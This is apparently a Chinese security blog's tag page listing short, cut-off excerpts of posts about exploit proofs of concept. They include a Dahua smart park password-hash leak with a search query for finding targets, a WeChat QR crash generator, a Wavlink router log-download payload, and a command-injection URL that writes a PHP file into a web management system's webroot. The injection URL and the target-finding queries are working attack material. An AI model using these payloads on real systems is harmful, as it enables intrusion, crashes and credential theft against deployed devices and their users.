标签「poc」下的文章


httpx+nuclei实战 | 大华智慧园区综合管理平台任意密码读取漏洞
2023-10-23

漏洞成因 没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码 hunter语法 web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台" POC

微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码
2023-04-24

注:代码可能带有破坏性,仅用于学习,分析用途。微信崩溃了?微信最新版二维码Bug,不知道问题在哪里。使用下面代码,轻松帮你复现。安装qrcodepip isntall qrcode 生成代码: import qrcode from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE def nvwu_put(self, num, length): if …

学python得永生,python大法好之利用python编写CVE-2022-34049 poc
2022-08-10

漏洞说明Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。影响版本Wavlink WN530HG4 M30HG4.V5030.191116漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportL…

搬运几个近期poc
2022-08-01

某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waH…

CVE-2022-30333 poc中的rar如何构造
2022-07-06

1. 描述UnRAR二进制文件中的路径遍历漏洞(CVE-2022-30333) 在github 公布项目poc中(地址:https://github.com/TheL1ghtVn/CVE-2022-30333-PoC),存在rar的poc。 通过winhex打开可见,一个rar中存在俩个同名为,sym的文件夹查询资料,得到构造…